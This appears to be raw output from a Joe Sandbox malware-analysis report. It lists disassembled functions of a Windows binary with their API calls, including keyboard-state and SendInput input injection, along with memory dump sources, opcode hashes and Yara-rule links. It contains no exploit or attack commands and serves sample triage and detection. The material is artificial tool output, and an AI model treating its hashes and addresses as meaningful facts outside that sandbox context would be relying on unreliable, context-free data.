                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Enable$Show$MessageMoveSend
                                                • String ID:
                                                • API String ID: 896007046-0
                                                • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                • GetFocus.USER32 ref: 00448ACF
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Enable$Show$FocusMessageSend
                                                • String ID:
                                                • API String ID: 3429747543-0
                                                • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                • __swprintf.LIBCMT ref: 0045D4E9
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                • String ID: %lu$\VH
                                                • API String ID: 3164766367-2432546070
                                                • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Msctls_Progress32
                                                • API String ID: 3850602802-3636473452
                                                • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                • String ID:
                                                • API String ID: 3985565216-0
                                                • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _malloc.LIBCMT ref: 0041F707
                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                • _free.LIBCMT ref: 0041F71A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free_malloc
                                                • String ID: [B
                                                • API String ID: 1020059152-632041663
                                                • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                • __calloc_crt.LIBCMT ref: 00413DB0
                                                • __getptd.LIBCMT ref: 00413DBD
                                                • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                • _free.LIBCMT ref: 00413E07
                                                • __dosmaperr.LIBCMT ref: 00413E12
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                • String ID:
                                                • API String ID: 155776804-0
                                                • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                • __freefls@4.LIBCMT ref: 00413D74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                • String ID:
                                                • API String ID: 259663610-0
                                                • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 004302E6
                                                • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                • GetClientRect.USER32(?,?), ref: 00430364
                                                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                • GetWindowRect.USER32(?,?), ref: 004303C3
                                                • ScreenToClient.USER32(?,?), ref: 004303EC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                • String ID:
                                                • API String ID: 3220332590-0
                                                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _malloc_wcslen$_strcat_wcscpy
                                                • String ID:
                                                • API String ID: 1612042205-0
                                                • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove_strncmp
                                                • String ID: >$U$\
                                                • API String ID: 2666721431-237099441
                                                • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 0044C570
                                                • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$InputSend
                                                • String ID:
                                                • API String ID: 2221674350-0
                                                • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
